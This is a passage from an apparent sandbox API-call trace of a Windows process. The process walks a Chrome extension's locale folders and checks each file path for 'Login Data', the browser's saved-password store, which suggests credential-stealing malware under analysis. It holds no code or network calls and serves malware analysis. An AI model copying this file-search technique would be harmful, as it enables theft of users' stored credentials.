returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.664] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.664] GetProcessHeap () returned 0x8e0000 [0161.664] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.664] lstrlenW (lpString="\\*.*") returned 4 [0161.664] GetProcessHeap () returned 0x8e0000 [0161.664] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925ba0 [0161.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.664] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*.*" [0161.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*.*", lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9bc0 [0161.666] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.666] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.666] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.666] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.666] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ar", cAlternateFileName="")) returned 1 [0161.666] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0161.666] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0161.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.666] lstrlenW (lpString="\\") returned 1 [0161.666] GetProcessHeap () returned 0x8e0000 [0161.666] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.666] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.666] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.666] lstrlenW (lpString="ar") returned 2 [0161.666] GetProcessHeap () returned 0x8e0000 [0161.666] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.666] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.667] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" [0161.667] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.667] GetProcessHeap () returned 0x8e0000 [0161.667] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned 137 [0161.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned 137 [0161.667] lstrlenW (lpString="\\*.*") returned 4 [0161.667] GetProcessHeap () returned 0x8e0000 [0161.667] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.667] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" [0161.667] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*.*" [0161.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.667] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.667] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.667] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.667] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.667] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xf6, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned 137 [0161.667] lstrlenW (lpString="\\") returned 1 [0161.667] GetProcessHeap () returned 0x8e0000 [0161.667] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.667] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" [0161.667] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\" [0161.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\") returned 138 [0161.667] lstrlenW (lpString="messages.json") returned 13 [0161.667] GetProcessHeap () returned 0x8e0000 [0161.667] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.667] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\" [0161.667] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" [0161.668] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.668] GetProcessHeap () returned 0x8e0000 [0161.668] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.668] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json", lpSrch="Login Data") returned 0x0 [0161.668] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.668] GetProcessHeap () returned 0x8e0000 [0161.668] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.668] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xf6, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.668] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.668] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.668] GetProcessHeap () returned 0x8e0000 [0161.668] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.668] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.668] GetProcessHeap () returned 0x8e0000 [0161.668] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.668] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="bg", cAlternateFileName="")) returned 1 [0161.668] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0161.668] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0161.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.668] lstrlenW (lpString="\\") returned 1 [0161.668] GetProcessHeap () returned 0x8e0000 [0161.668] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.668] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.668] lstrlenW (lpString="bg") returned 2 [0161.668] GetProcessHeap () returned 0x8e0000 [0161.668] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.668] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" [0161.668] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.669] GetProcessHeap () returned 0x8e0000 [0161.669] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned 137 [0161.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned 137 [0161.669] lstrlenW (lpString="\\*.*") returned 4 [0161.669] GetProcessHeap () returned 0x8e0000 [0161.669] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.669] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" [0161.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*.*" [0161.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.669] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.669] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.669] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.669] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.669] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned 137 [0161.669] lstrlenW (lpString="\\") returned 1 [0161.669] GetProcessHeap () returned 